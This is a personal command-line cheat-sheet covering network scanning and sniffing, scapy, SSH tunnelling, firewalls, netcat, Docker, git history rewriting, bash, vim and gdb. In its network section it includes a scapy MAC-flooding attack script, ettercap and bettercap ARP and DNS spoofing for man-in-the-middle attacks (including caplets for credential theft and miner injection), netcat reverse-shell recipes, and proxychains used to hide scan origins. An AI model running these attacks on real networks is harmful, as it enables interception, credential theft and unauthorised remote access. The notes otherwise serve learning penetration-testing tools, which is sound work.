- Generally, you don't want to run the default scan settings, which do a bunch of things by default in an untargeted, unstealthy, and extremely fingerprintable (because default Nmap behavior is easily identifiable) way. Typically, you'll want to start with a few different types of host discovery scans before making different types of port scans, for example. This is to say that, in the real world, you won't be running a single comprehensive scan against even a mildly advanced target, you'll instead be breaking up your penetration into multiple chunks executed across some time delays. The point: You must come up with your own usage strategies depending your scenario because the defaults will not do -- you actually have to understand things.
-oA myscan-%Doutputs results in every format to files namedmyscan-<date>.<extension>-vverbose mode shows additional detail, including less reliable guesses on targets, depending on the scan type-Pnto treat all hosts as online (skip host discovery)- Port scanning:
- Manpage:
The state is either open, filtered, closed, or unfiltered. Open means that an application on the target machine is listening for connections/packets on that port. Filtered means that a firewall, filter, or other network obstacle is blocking the port so that Nmap cannot tell whether it is open or closed. Closed ports have no application listening on them, though they could open up at any time. Ports are classified as unfiltered when they are responsive to Nmap's probes, but Nmap cannot determine whether they are open or closed. Nmap reports the state combinations open|filtered and closed|filtered when it cannot determine which of the two states describe a port.
-snto disable port scanning-sSfor TCP SYN scan (requires root)- The default scan type when running as
root - Fast, reliable, and relatively unobtrusive and stealthy
- AKA "half-open" scanning, because you don't complete TCP connections, you just make the request to establish a connection and then drop, awaiting response to determine port status
- The default scan type when running as
-sTfor TCP connect scan- The default scan when not running as
root
- The default scan when not running as
-sVenables version scanning-sCenables script scanning-p-to scan all 65,535 ports rather than 1,000 most common-Aenables-O,-sV,-sC, and--traceroute
- Manpage:
-sIto perform an idle (zombie) scan- Typically used with
-Pnto prevent pings originating from true IP in compliance with-sI
- Typically used with
-nto disable reverse DNS resolution-Oenables OS detection--tracerouteenables traceroute--packet-tracedetails the packets being sent-iL <file>to read target hosts from a file-T<template>to set the dynamic timing template for a particular scan type- Manpage:
The first two are for IDS evasion. Polite mode slows down the scan to use less bandwidth and target machine resources. Normal mode is the default and so -T3 does nothing. Aggressive mode speeds scans up by making the assumption that you are on a reasonably fast and reliable network. Finally insane mode assumes that you are on an extraordinarily fast network or are willing to sacrifice some accuracy for speed.
paranoidor0sneakyor1politeor2normalor3aggressiveor4insaneor5
- Manpage:
- Uses ARP requests by default for LAN-based host discovery
- Do read the book: https://nmap.org/book/toc.html. Useful chapters:
tracepath(traces path to a network host discovering MTU along this path; fromiputils; typically usetracerouteinstead)traceroute(print the route packets trace to network host)traceroute google.comtraces the route from you togoogle.com- You can use
whois <host>to assess different hops and see who the traffic is being routed through
- You can use
whois(client for the whois directory service)whois <host>
ngrep(network grep)tcpdump(dump traffic on a network)- Compared to
tshark: quick and simplex filtering; lightweight and widely available (pre-installed on most systems); useslibpcapfor backend tcpdump ipto monitor only IPv4 traffictcpdump not host <host>to monitor all traffic not associated with<host>tcpdump -pto monitor traffic destined to or originating from our host (disable promiscuous mode)tcpdump port <port> or host <host>to monitor a specific port or host's traffictcpdump -w traffic.capto capture traffic totraffic.captcpdump -r traffic.capto read traffic fromtraffic.cap-c <capture-count>to stop capturing after<capture-count>packets
- Compared to
tshark(dump and analyze network traffic; TUI version of Wireshark)- Compared to
tcpdump: generally just richer; more complex filtering; deep protocol analysis; more scriptable; prettier output; more output formats; more protocols; useslibpcap+ dissection engine for backend - Filters
- Capture and display filters use entirely different syntax:
tshark -f 'not host <host>'to capture traffic with capture filter- or
tshark not host <host>as shorthand
- or
tshark -Y 'ip.addr==<addr>'to capture traffic and apply display filter to output
- Capture filters are much more efficient than display filters
- A capture filter applies to all interfaces if specified before the first
-ioption, and to the last-iinterface if specified after the first-ioption - Capture filters can be specified multiple times
- Capture and display filters use entirely different syntax:
tshark --hexdump all host <host> and port <port>to print a full hexdump (--hexdump all) of traffic captured that matches the specified host and port
- Compared to
- See https://scapy.readthedocs.io/en/latest/usage.html
helpbuiltin is useful as always (mostly not sarcastic)ls(list available layers, or info on a given layer class or name)ls()to list layersls(layer)to list info on a layerls(ICMP)to see the fields of the ICMP packet protocolls(ICMP())to see the fields of the ICMP packet protocol after initialization (shows default init values)
- Sending and Receiving
- Layer 3 (standard)
send(packets, iface=None)to send packets at layer 3sr(packets)to send/receive packets at layer 3
- Layer 2 (specify custom
Etherheader)sendp(packets, iface=None)to send packets at layer 2srp(packets)to send/receive packets at layer 2
ans,unans = _to read latest packets receivedresponse.summary()andresponse.show()both print a summary of details of a response
- Layer 3 (standard)
- Crafting
<packet2>/<packet1>to stack<packet1>within<packet2>- Eg,
packet = IP(dst='google.com') / ICMP()crafts an ICMP ping packet
- Eg,
dhcp_discover_packet = Ether(src='00:11:22:33:44:55', dst='ff:ff:ff:ff:ff:ff') / IP(src='0.0.0.0', dst='255.255.255.255') / DHCP(options=[('message-type', 'discover'), 'end'])sendp(dhcp_discover_packet)
- Make and inspect two DNS queries, one to
1.1.1.1(Cloudflare's DNS) and one to8.8.8.8(Google's DNS)- (See DNS record query types https://en.wikipedia.org/wiki/List_of_DNS_record_types)
dns_query_packet = IP(dst=['1.1.1.1', '8.8.8.8']) / UDP(dport=53) / DNS(qd=DNSQR(qname='secdev.org', qtype='A')) # 1) Inspect both DNS queries and answers... for query,answer in results: query.show() # Equivalent to results[<idx>].query.show() answer.show() # Equivalent to results[<idx>].answer.show() # 2) ...or just inspect the first DNS query and answer results[0].query.show() results[0].answer.show()
- Sniffing (Capturing) and Inspecting
sniff(sniff packets and return a list of packets)sniff(offline='traffic.cap')to read a packet capture file instead of sniffsniff()to sniff on all interfacessniff(iface=<interface>, prn=<function>, filter=<filter>)to sniff on a particular interface and apply a function to each packet- Example function:
prn=lambda p: p.summary() - Example filter:
filter='port 80'
- Example function:
- Sniff HTTP requests:
from scapy.all import sniff from scapy.layers.http import HTTPRequest def process_packet(packet): if packet.haslayer(HTTPRequest): url = packet[HTTPRequest].Host.decode() + packet[HTTPRequest].Path.decode() ip = packet[IP].src method = packet[HTTPRequest].Method.decode() print(f'[+] {ip} Requested {url} with {method}') # Start sniffing the network on the default interface for HTTP traffic sniff(filter='port 80', prn=process_packet, store=False)
wrpcap('traffic.cap', packets)to write captured packets to a packet capture filerdpcap('traffic.cap')to read a packet capture filetraceroute('google.com')to run a traceroute ongoogle.comtshark()to sniff (capture) and print packets in atshark-like formatwireshark(packets)to run Wireshark on a pre-captured list of packets
- There are one-liners available to perform ARP cache poisoning
- CAM overflow / MAC flooding (https://github.com/0xbharath/scapy-scripts)
#-------------------------------------------------------------------------------# # A script to perform CAM overflow attack on Layer 2 switches # # Bharath(github.com/yamakira) # # # # CAM Table Overflow is all about flooding switches CAM table # # with a lot of fake MAC addresses to drive the switch into HUB mode. # #-------------------------------------------------------------------------------# #!/usr/bin/env python from scapy.all import Ether, IP, TCP, RandIP, RandMAC, sendp #destMAC = "FF:FF:FF:FF:FF:FF" '''Filling packet_list with ten thousand random Ethernet packets CAM overflow attacks need to be super fast. For that reason it's better to create a packet list before hand. ''' def generate_packets(): packet_list = [] #initializing packet_list to hold all the packets for i in xrange(1,10000): packet = Ether(src = RandMAC(),dst= RandMAC())/IP(src=RandIP(),dst=RandIP()) packet_list.append(packet) def cam_overflow(packet_list): # sendpfast(packet,iface='tap0', mbps) sendp(packet_list, iface='tap0') if __name__ == '__main__': packet_list = generate_packets() cam_overflow(packet_list)
ettercap(multipurpose sniffer/content filter for man in the middle attacks; version>0.7.0) TODO: Test this more thoroughly and come up with more examplesettercap -Tettercap -T -M arp:local -P dns_spoof <targets-spec>to start a TUI-basedettercapsession (-T), activate an ARP-based MITM attack targeting localhost (-M arp:local), and run thedns_spoofplugin (-P dns_spoof), all against targets<targets-spec>.<targets-spec>:- Takes the form of
MAC/IPs/ports 11:22:33:44:55:66/192.168.0-1.0-255,10.0.0.1/0-20to specify a target of that MAC address, those IPs, and those ports//0-20to specify target of any MAC address, any IP, and ports 0-20
- Takes the form of
/etc/ettercap/etter.dns(host file for dns_spoof plugin; specifies target host file modifications during DNS spoofing attack)
bettercapis a newer version ofettercapwhich primarily operates interactively (a standard tool in MiTM)- https://www.bettercap.org/
- Caplets (NOTE: Most of the vulnerabilities that these exploit are supposedly older and ineffective)
bettercap -caplet /usr/local/share/bettercap/caplets/crypto-miner.cap -eval "set arp.spoof.targets 10.10.10.102"to use a capletcrypto-miner.cap- Deploy crypto-mining JavaScript in all HTTP requestslocal-sniffer.cap- Use Bettercap as a local sniffer with protocol-filtering optionslogin-man-abuse.cap- Exploit browser built-in login managers to steal credentialsfb-phish.cap- Create a fake Facebook login page to collect credentialsrogue-mysql-server.cap- Impersonate and intercept MySQL server connectionssimple-passwords-sniffer.cap- Capture any network activity with password= in the payloadstsoy.cap- Spoof all DNS responses for Microsoft and Google, serving up BeEF hooksweb-override.cap- Replace every unencrypted web page with a static page of the adversary's choosing
bettercap -iface eth0to start an interactive session (you should specify an interace so it doesn't choose loopback)helpto show helphelp <module>to show status of module and available commands
net.showto show list of cached hostsnet.reconmodule (read periodically the ARP cache in order to monitor for new hosts on the network; passive monitoring of ARP cache to determine hosts on network)help net.reconto show help for thenet.reconmodulenet.recon onto start host discovery (on by default)net.recon offto stop host discovery
net.probemodule (keep probing for new hosts on the network by sending dummy UDP packets to every possible IP on the subnet; active probing to determine hosts on network)net.probe onnet.probe off- Observe:
net.probe ontcpdump arpto see to ARP requests continuously being fired outwatch -n 0 arp -nto see ARP requests continuously being received (-nto avoid spamming DNS requests due to runningarprepeatedly viawatch)net.probe offand see it all stop
arp.spoofmodule (keep spoofing selected hosts on the network)set arp.spoof.targets <IP1,IP2,...>to set IP addresses to target, comma-separatedarp.spoof onto start active hosts discovery (UPNP, mDNS, NBNS, WSD)arp.spoof offto stop active hosts discovery
dns.spoofmodule (replies to DNS messages with spoofed responses)dns.spoof ondns.spoof offset dns.spoof.address <address>to set the IP address to return for spoofed DNS answersset dns.spoof.domains <domain1,domain2,...>to set a list of domain targets for DNS spoofing, comma-separatedset dns.spoof.all <bool>to perform DNS spoofing for all requests regardless of domain, hosts fileset dns.spoof.hosts <hostsfile>to perform DNS spoofing for the entries mapped in<hostsfile>
proxychainsproxychainscaptures the network traffic (eg, Nmap TCP scan pings) of any given command and redirects it through proxies specified in the configuration file- Configuration:
/etc/proxychains(4).conf- You can specify which proxies (eg,
socks4 172.0.0.1 9050) to go through, how to go through them, timeouts, and more
- You can specify which proxies (eg,
- Configuration:
ssh -NR 9050 10.90.50.200to set up a remote SSH SOCKS proxy (see section on SSH)- Port
9050because it's the default localhost proxy specified in theproxychainsconfiguration file proxychains nmap -vv 192.168.0.0/24on the remote to tunnelnmapnetwork traffic through the SSH SOCKS proxy, which encrypts and masks the network traffic- Observe the scan through Wireshark and note that the encrypted scan traffic appears to originate from the client rather than the remote (
10.90.50.200)
- Observe the scan through Wireshark and note that the encrypted scan traffic appears to originate from the client rather than the remote (
- Port
ssh-copy-id(use locally available keys to authorise logins on a remote machine)-vcan be useful when troubleshooting
~/.ssh/authorized_keyson a server contains the public keys of client users allowed to connect to your server account via SSH~/.ssh/known_hostson a client's machine contains the public host keys of servers (stored on the server in/etc/ssh/ssh_host_*_key.pub) previously connected to or otherwise known- This is used to detect MITM attacks by having the server verify its identity
- SSH clients will usually warn and ask for confirmation on new or changed (eg, domain provides different public host key than known) server public host keys before going through the handshake signature for full public/private keypair verification
/etc/ssh/ssh_host_..._key.pubfiles on a server are a server's public host key files that are used by the SSH daemon to authenticate the server- Modifying
~/.ssh/configwith...allows you to doHost myserver HostName 192.168.1.10 User yourusername IdentityFile ~/.ssh/id_ed25519 Port 2220ssh myserveras a shorthand for future connections
ssh -N(do not execute a remote command; useful for just forwarding ports)- Local SSH Tunnel
ssh -L [<client>:]<client-port>:<host>:<host-port> <remote>to set up an SSH tunnel from<client>(localhostif not specified) on port<client-port>to<host>:<host-port>via<remote>ssh -NL 1234:unixwiz.net:80 192.168.0.71to set up a local SSH tunnel tounixwiz.net:80via192.168.0.71- Use
localhost:1234to communicate withunixwiz.net:80, using192.168.0.71as proxy- Eg,
curl localhost:1234sends aGETrequest tounixwiz.net:80via192.168.0.71, who then forwards the reply back to the client
- Eg,
ss -tplshows127.0.0.1:1234listening locally- This is observable through Wireshark. You won't see any requests to
unixwiz.net:80originating from the client, just192.168.0.71 curldoesn't know anything about the forwarding. It simply makes the request, and SSH forwards it back and forth between the client and server.
- This is observable through Wireshark. You won't see any requests to
- Use
- Reverse (Remote) SSH tunnel
ssh -R <remote-port>:<host>:<host-port> <remote>to set up a reverse SSH tunnel from<remote>:<remote-port>to<host>:<host-port>via client- Allows the remote to use tools from their machine as if they were on the client's network rather than having to move their tools to the client
- NOTE; VERIFY THIS: You'll have to proxy some of your tools' network traffic through the SSH tunnel client since the tools you're running (eg,
nmap) may encode your IP as the origin before being sent through the SSH tunnel client (see section onproxychains) - Eg, with a web service forwarded locally to their machine, they can interact that service the way they'd interact with any service accessable via their machine
- NOTE; VERIFY THIS: You'll have to proxy some of your tools' network traffic through the SSH tunnel client since the tools you're running (eg,
ssh -NR 1234:unixwiz.net:80 192.168.0.71to set up a reverse SSH tunnel from192.168.0.71:1234tounixwiz.net:80via client- Use
localhost:1234on the remote to communicate withunixwiz.net, using the client as proxy ss -tplon the remote shows127.0.0.1:1234listening locally
- Use
ssh -NR 1234:192.168.0.1:80 10.90.50.200- Allows remote at
10.90.50.200listening on theirlocalhost:1234to communicate with client's router192.168.0.1:80, via the client on their internal network ss -tplon the remote shows127.0.0.1:1234listening locally- Opening
localhost:1234in a browser will allow the remote to interact with the client's router
- Allows remote at
- Dynamic Reverse (Remote) SSH tunnel using SOCKS proxy
- SOCKS (Wikipedia: SOCKS is an Internet protocol that exchanges network packets between a client and server through a proxy server)
curland most browsers support SOCKS, while most tools do not support SOCKS
ssh -NR 1234 10.90.50.200to set up a dynamic reverse SSH SOCKS tunnelcurl -vL --socks4 127.0.0.1:1234 unixwiz.neton remote to make aGETrequest tounixwiz.netvia clientcurl -vL --socks4 127.0.0.1:1234 192.168.0.1on remote to make aGETrequest to the client's router via client
- SOCKS (Wikipedia: SOCKS is an Internet protocol that exchanges network packets between a client and server through a proxy server)
- Dynamic Local SSH tunnel using SOCKS proxy
- Use to enter a client's network
ssh -ND 1234 10.90.50.200on client to set up a local SSH SOCKS proxy bound to server10.90.50.200:1234curl -vL --socks4 127.0.0.1:1234 unixwiz.neton client to make aGETrequest tounixwiz.netvia the servercurl -vL --socks4 127.0.0.1:1234 192.168.0.1on client to make aGETrequest to the remote's router via the server
iptableswas used to manage Linux's netfilter firewall framework, with a front-end utility calledufwwhich is supposedly transitioning into a front-end for the preferrednftables.iptablesis now considered legacy in favor ofnftables. All three utilities are still currently widely available.
nft is the command line tool used to set up, maintain and inspect packet filtering and classification rules in the Linux kernel, in the nftables framework. The Linux kernel subsystem is known as nf_tables, and ‘nf’ stands for Netfilter
ufw enableto enable the firewallufw disableto disable the firewallufw reloadto reload the firewallufw resetto reset the firewallufw status numberedto view the firewall statusufw allow 22to allow port 22ufw deny from 1.2.3.4to deny an IPufw delete 1to delete rule 1
iptables --versiondisplays program version and the kernel API used (eg,nf_tables)iptables -t nat -Lto list (-L) NAT table (-t nat) rulesiptables -t nat -D POSTROUTING 1to delete (-D) the first (1) NAT table rule in thePOSTROUTINGchainiptables -t nat -A POSTROUTING -s 192.168.0.0/16 -o ens4 -j MASQUERADEto NAT-forward traffic from a range of hosts via our IP address- Requires (I think)
sysctl -w net.ipv4.ip_forward=1to allow IP forwarding at all on the host
- Requires (I think)
-ndisplays IP addresses instead of resolved names (eg,0.0.0.0/0instead ofanywhere)-t natspecifies that we're working with the NAT table rules-A POSTROUTINGappends to thePOSTROUTINGchain- A chain is where along the chain of processing a rule is applied
- The
POSTROUTINGchain applies rules to traffic after routing decisions have already been made, but before the traffic leaves the system
-s 192.168.0.0/16specifies the source range of IP addresses that a rule would match-o ens4specifies which interface to send matching traffic out through-j MASQUERADEspecifies the match action for the rule (what to do when the rule matches)- The
MASQUERADEaction (AKAMASQ) maps the source IP address of matching traffic to our IP address- It is only available in the NAT table in the POSTROUTING chain
- The
- NOTE: Exact syntax depends on
netcat-traditionalvsnetcat-openbsdvsnmap'sncatand exact versionnetcat-traditionalrequires-pto specify port when listening, whilenetcat-openbsddoes not
nc <address> 22to see if SSH is running on host- Scan:
nc -z <host> 1-65535to scan all ports on<host>(may wish to use with-zfor progress) - Simple communication
host1$ nc -l -p 1234to listen on a hosthost2$ nc <host1> 1234to send traffic to the listening hosthost3$ nc <host1> 1234 -c "<command>"to send thestdoutof<command>to the listening host and close connectionhost4$ nc <host1> 1234 -c "<command> 2>&1"to send thestdoutandstderrof<command>to the listening host and close connection
- Simple traffic logging
host1$ nc -l -p 1234 -o nc-traffic.hexto listen on a host and redirect messages to filehost1$ xxd -r nc-traffic.hexto reverse subseqent traffic hex
- Simple reverse shell
- Using modern
netcat(with-eavailable)host1$ nc -l -p 1234 -e /bin/bashto execute all received messages via bashhost2$ nc <host1> 1234to establish connection to listener<command>fromhost2during remote session to execute<command>on the listener's system
- Using older
netcat(no-eavailable)- Listener (victim, if hacking scenario):
rm -f /tmp/commands; mkfifo /tmp/commandsto make a temporary input stream that we can redirect tobashcat /tmp/commands | /bin/bash -i 2>&1 | nc -l -p 1234 > /tmp/commands
- Client (adversary, if hacking scenario)
nc <listener-address> 1234to connect
- Listener (victim, if hacking scenario):
- Using modern
- Transfer a file to another host
host1$ nc -l -p 1234 > rx-fileto listen for connections and redirect stream to filehost2$ nc -N <host1> 1234 << tx-fileto transfer a file and close the connection (-N) on EOF
- Transfer an SSH public key from client to listener
host1$ nc -l -p 1234 >> ~/.ssh/authorized_keysto listen and append transferred key toauthorized_keyshost2$ nc -N <host1> 1234 < ~/.ssh/key.pubto transfer the key file to listener and close the connection (-N) on EOF
- Transfer an SSH public key from listener to client
- Scenario: I needed to do this one time because I couldn't set up a listener (accept inbound connections from the LAN) because WSL was behind a NAT. Instead, I set up a listener on the machine who wanted to send, and had the listener send the file.
host1$ nc -l -p 1234 < <(tail -n 1 ~/.ssh/authorized_keys)to listen for connections, while putting the specified contents in the streamhost2$ nc <host1> 1234 > ~/.ssh/key.pubto grab the contents of that file and redirect it to the proper file
dig(dig is a flexible tool for interrogating DNS name servers)nslookup(nslookup is a program to query Internet domain name servers)nslookup 7-zip.orgto get the IP for7-zip.org
netstat(print network connections, routing tables, interface statistics, masquerade connections, and multicast memberships; usessinstead)netstat -rto display the kernel routing tables (route -eproduces the same output) (replaced byip route)netstat -tupaand other variations to see services exposed by your devicenetstat -pa | grep -i sshto find sockets/programs runningssh, and users/uids with established SSH connectionsnetstat -ito display all network interfaces (replaced byip -s link)- *NOTE: Almost certainly use
watch -n 1 winstead for this use case
- *NOTE: Almost certainly use
ifconfig(configure a network interface; useipinstead)ifconfig -v -a -sto view short (-s) list of all (-a) interfaces (up and down) with additional error message detail (-v)
routeroute -nto see routes without resolving addresses to names (-n)route -eto see routes using netstat format
ss(another utility to investigate sockets)ss -a | grep -i sshto find sockets/programs runningssh, and uids with established SSH connectionsss -ntulpto find processes listening (-l) on TCP (-t) and UDP (-u) sockets. Show the process (-p) and do not resolve addresses (-n)
ip(show / manipulate routing, network devices, interfaces and tunnels)-brfor brief output (supported byaddr,link,neigh)addrip addr del 192.168.0.88/24 dev ens33to delete that IP prefix on that interface
monitor(watch for netlink messages)- Useful when setting up or modifying interfaces, routes, etc
neigh(show current neighbor table in kernel) (ARP or NDISC cache entries)route(show table routes)link(show current link-layer links between interfaces and MAC addresses)ip -s linkto show all link statisticsip -s link show eth0to showeth0interface statistics
tc(show / manipulate traffic control settings)
- Since Docker Engine version
28.4.0 d8eb465: https://docs.docker.com/engine/release-notes/28/#2840 - See the Docker CLI reference: https://docs.docker.com/reference/cli/docker
- See the Dockerfile reference: https://docs.docker.com/reference/dockerfile
- See Docker Hub image search: https://hub.docker.com/search
- The
alpineimage is very small, making it really fast to pull down, start up, and hasbusyboxpre-installed by default. This all allows for quick testing. - The
python:3.xx-alpineimages are typically slimmer than thepython:3.xx-slimslim Debian images, but have fewer features
docker scout(check vulnerabilities in base images; extremely nifty)docker scout recommendationsto get recommendations on last built imagedocker scout recommendations --tag <image>to get recommendations
docker network:docker network lslists networks available to connect to a containerdocker network inspect <network-name>to inspect a network's configuration, including connected containers and their IP addresses
docker builder prune -ato remove all image build cachedocker system(manage docker)docker [system] eventsto monitor server events in real timedocker system dfto show disk usage-vfor detailed breakdown
docker [system] infoto show general Docker and system informationdocker system pruneto remove unused data
docker image pruneto remove dangling images (images not tagged or referenced by any containers)-ato remove all images currently unused (without an associated running container)
docker [image] build . -t <image-name>:<optional-tag>to build the image specified by the current directory's Dockerfiledocker [image] build . -o tempfsto build an image from current directory's Dockerfile and dump its filesystem to a directory
docker image[s | ls]to list images-qto list IDs only
docker [container] commit <container> [<image-name>:<tag>]persists a running container as a new imagedocker image rm <container> [-f]to remove an image
docker container lsordocker [container] psto see running containers-ato see all containers-qto list container IDs only
docker [container] inspect <container>to view a container's configurationdocker [container] stats [containers]to monitor resource utilization for all or some containersdocker [container] top <container>to list a container's running processesdocker [container] exec -it <container> <command>to execute<command>in interactive mode with an explicitly allocated TTY- Use the same command without
-itto execute a non-interactive command (one which does not expect STDIN to remain open during execution) within a container- For example,
apk --versionwould execute, output, and exit, no input/interaction
- For example,
- Use the same command without
docker [container] attach <container>to attach to a container- Stopping containers:
docker [container] stop <container>to stop a container from runningdocker [container] stop $(docker ps -q)to stop all containers from runningdocker [container] kill <container>to forcefully kill (SIGKILL by default) a container
- Removing containers:
docker [container] rm [-f] <container>to remove a container-fto forcefully kill (SIGKILL) if running and then remove
docker [container] pruneto remove all stopped containers
docker [container] start <container>(start one or more stopped containers)docker [container] run(create and run a new container from an image)-ato attach STDOUT/STDERRdocker [container] run -[d]it [--rm | --restart=always] [--name <container-name>] <image-name>starts up a container and attaches to an interactive shell for the container of the specified image.--rmdeletes container on stop-dstarts detached--restart=alwaysrestarts the container under all circumstances (reboot, crash, etc) execpt manual stop/kill via Docker--name <container-name>provides a name to the container
docker [container] run -dit --name <container> --network <network-name> <image-name> shcreates and starts up a container with the assigned name, network, and image. It starts in detached mode runningsh.- NOTE: New containers are generally added to the default bridge network,
docker0
- NOTE: New containers are generally added to the default bridge network,
- Container priviliges and capabilities
- See the docs: https://docs.docker.com/engine/containers/run/#runtime-privilege-and-linux-capabilities
--cap-addor--cap-dropto add or remove container priviliges and capabilities--device=[]to allow a device to run inside a container
git log --diff-filter=A -- <relative-path/file>to search logs for diffs where a file was addedgit filter-repo(rewrite repository history; external tool)git filter-repo --replace-text replacements.txt--dry-run--path <path>to preserve only that path in the repo history--invert-paths --path <path1> --path <path2>to delete those paths from the repo history- Dry run and preview:
--dry-rundiff --color .git/filter-repo/fast-export.original .git/filter-repo/fast-export.filteredto preview changes
git reflog(manage reflog information)expire(prune older reflog entries)--expire=<time> --allto prune all reflog entries older than<time>, making them unreachable (git gcwill automatically remove loose reflog entries when it decides to)
git gc(cleanup unnecessary files and optimize the local repository)--prune=<date>(prune loose objects older than date)--aggressive(more aggressively optimize the repository at the expense of taking much more time)
WARNING: These steps are rough and not to be followed blindly. History rewriting is highly and widely destructive. Read the official documentation carefully.
git clone --mirror --no-local <local-repo-path> <mirror-repo-dest>to clone a mirror of the local repo, which we will perform sanitization oncd <mirror-repo-dest>git-filter-repo --dry-run --replace-text replacements.txtto perform a dry-run text replacement across all files of the repo (replacements.txtshould have one regex per line)diff --color .git/filter-repo/fast-export.original .git/filter-repo/fast-export.filteredto preview changesgit-filter-repo --replace-text replacements.txtto perform the actual text replacementgit reflog --expire=now --allto expire all reflog entries so they become unreachable and removablegit gc --prune=now --aggressiveto remove all expired reflog entries and perform aggressive repo optimizations (NOTE:--aggressiveis potentially very slow for large repos)git push --force --allto overwrite all branches on the remote repogit push --force --tagsto overwrite all tags on the remote repo
- Manpage
Subtrees allow subprojects to be included within a subdirectory of the main project, optionally including the subproject’s entire history.
For example, you could include the source code for a library as a subdirectory of your application.
Subtrees are not to be confused with submodules, which are meant for the same task. Unlike submodules, subtrees do not need any special constructions (like .gitmodules files or gitlinks) be present in your repository, and do not force end-users of your repository to do anything special or to understand how subtrees work. A subtree is just a subdirectory that can be committed to, branched, and merged along with your project in any way you want.
git subtree add --prefix=<where/to/put/it> <repo> <ref>to add a subtree within a repo- Use
--squashto squash the subtree's history into a single commit
- Use
TODO
TODO
TODO
aliasaliasto print all aliasesalias <name>to view an aliasalias <name>=<command>to set an aliasunaliasto remove an alias
echo $RANDOMprints a random numberdeclare(set variable values and attributes; for advanced variable declaration)readonly const='my constant'to set a constant variablewhich -a <command>to see all paths found for a command>new-fileto quickly create a new file instead oftouch new-file.bash_profileonly runs on logon (orbash -l)
- Always quote strings, prefer single quotes
- Script Suffixes (eg,
script.sh)- rwxrob argues against using suffixes for scripts, such as in "my-script**.sh**", on Unix, Linux, and Mac. His argument is that it reduces your script's portability by restricting that script to be only written in the extension's specific language (
.bashfor bash,.pyfor Python, etc). - Naming the script without an extension allows you to drop-in scripts written in different languages or to drop-in different binaries, especially as your project grows and you need to make changes to your infrastructure, or if your script could be placed in your system's PATH.
- This is particularly important for larger or enterprise-level projects.
- rwxrob argues against using suffixes for scripts, such as in "my-script**.sh**", on Unix, Linux, and Mac. His argument is that it reduces your script's portability by restricting that script to be only written in the extension's specific language (
#!/bin/bashvs#!/usr/bin/env bash- Using
envin a shebang allows the firstbashexecutable located in thePATHvariable to be used if it exists. This presents a security risk as a non-system maliciousbashcan be executed. Hardcoding the default systembasheliminates this risk. - Choose based on your concerns. Generally,
envBash is preferred unless security is of special concern.
- Using
sourcevsexecon Bash Configs- Instead of
sourceing your Bash configs, useexec bash, which will actually wholly replace the current shell and reset all state to avoid unexpected behavior and garbage buildup, including closing all processes held open by the shell. - Tip: Use
exec bash -lif you're updating your.bash_profile.
- Instead of
- Use
shellcheckon important scripts to detect errors and potential bugs - Use
setwith options to improve safety and predictabilty of shell scripts (use within shell scripts)-o posixto run in Posix mode- Some common options for safety:
-eto exit immediately if a command exits with a non-zero status-o pipefailto exit using last nonzero status in command pipeline if present-uto treat unset variables as an error when substituting-Cto disallow existing regular files to be overwritten by redirection of output
- Some common options for debugging:
-vto print shell input lines as they are read-xto print commands and their arguments as they are executed-nto read commands but not execute them
shfmt(format shell programs)-i <indent>to specify indentation-wto format the file in place (instead of writing to standard output)-dto error with a diff of the changes
- Some versions of
echoallow-eto enable backslach escapes (eg,echo -e 'hi\n'), but it's not as universalprintf, so generally preferprintf printf "%s %10s\n" 'bob' 'alan'->bob alanwith 10 spaces in between
echo -e 'line1\nline2\nline3'if-eavailableprintf 'line1\nline2\nline3\n'
printf 'line1
line2
line3
'echo 'line1
line2
line3cat<<EOF
line1
line2
line3
EOFlist=(1 2 3); for i in ${list[@]}; do echo $i; doneto create and loop over an array of elementsvar=2echo '$var'->$varecho "$var"->2
echo {1..5}->1 2 3 4 5
for i in 1 2 3; do echo $i; done
<(command)executescommandin a subshell context, does not preserve calling shell variable changes, and passes the output as a file to the parent shell. <(command)with.executes the output ofcommandas a file in the current shell context
$ cat <(echo hi;echo hi) hi hi$(command)executescommandin a subshell context but does not preserve calling shell variable changes, and does capture the resulting output as a string./$(echo sayhi)->./sayhi->hiiam=$(whoami)->iam=holychowdersecho $(echo hi;echo hi)->hi hi
(command)executescommandin an isolated subshell which does not preserve shell variable changes. Output is captured, but its use is limited.(echo hi)->hiecho (echo hi)does not workecho $( (echo hi) )->hi
/\<word\> with escaped < and > allow matching on whole words
/\v<word> with \v ("very magical") allows matching on whole words without escaping < and > and permits other more modern and convenient expansions
:help profilefor more complete information:profile start /tmp/vimprofile.logto begin profiling session:profile file *to track and profile all scripts that get run:profile func *to track and profile all functions from profiled scripts:profile dumpto write profiling data to logfile:profile pauseto pause profiling and write to logfile:profile continueto continue profiling:profile stopto stop profiling and write to logfile
If you forgot to use sudo to open a file, you can redirect the contents of the buffer to sudo tee to write the file instead
:w !sudo tee % > /dev/null
See the excellent GDB Quick Reference by UTexas: https://users.ece.utexas.edu/~adnan/gdb-refcard.pdf
helphelpfor general helphelp <command>for help on a commandapropos -v <word>for full documentation of commands related to<word>
file <program>to load a programb[reak] [file:][function]to break at the current line or[function]in[file]r[un] [arguments]to re/start the loaded program withargumentss[tep] [count]to step into the next instructioncounttimesn[ext] [count]to step over the next instructioncounttimes- Press
Enterto repeat the last command i[nfo][b]reak[points]to list breakpointswatch[points]to list watchpointslocalsto list local variablesargsto list arguments to current function[r]egistersto print the state of the registersaddress mainto print the address of symbolmainsharedlibraryto print status of shared object librariesproc mappingsto list proces
p[rint]<expression>to evaluate and print<expression><variable>to print variable/d— decimal/x— hexadecimal/o— octal/t— binary/u— unsigned decimal/c— character/f— floating point
watchwatch xto break when symbolxchangeswatch <expression>to break whenexpressionevaluates true
c[ontinue]to continue running the program if paused
core-file <core>to load a core dumpclearto delete all breakpointsd[elete] [breakpoint-numbers]to delete the breakpoint at the cursor or those specifiedframeto print current framebtfor backtracelist .to list current position in the sourcedisas mainto disassemble symbolmainx/10i mainto examine the first10lines ofinstructions of symbolmainin memory
ldd(print shared object dependencies)- WARNING(SECURITY): Some versions of
lddmay try to execute the binary to resolve dependencies. Preferobjdump -p <binary> | grep NEEDEDwhen working with untrusted binaries. ldd <binary>
- WARNING(SECURITY): Some versions of
readelf(display information about ELF files)-Wfor wide display-a-hto display the ELF header information-sto dump symbols-Cto demangle (C++)
-eto display all headers-Vto display version sections-Ato display architecture-specific information
objdump(display information from object files)-dto disassemble-tto display symbols-gto display debugging information-hto display summaries from each section header-fto display overall summary from each section header-pto display headers-sto display full contents of each section (hex dump)- Use with
-j <name>to select a particular section - Use with
-Zto decompress any compressed sections
- Use with
-j <name>to display information for a specific section-xto display all header information--start-address=<address>--stop-address=<address>- Example:
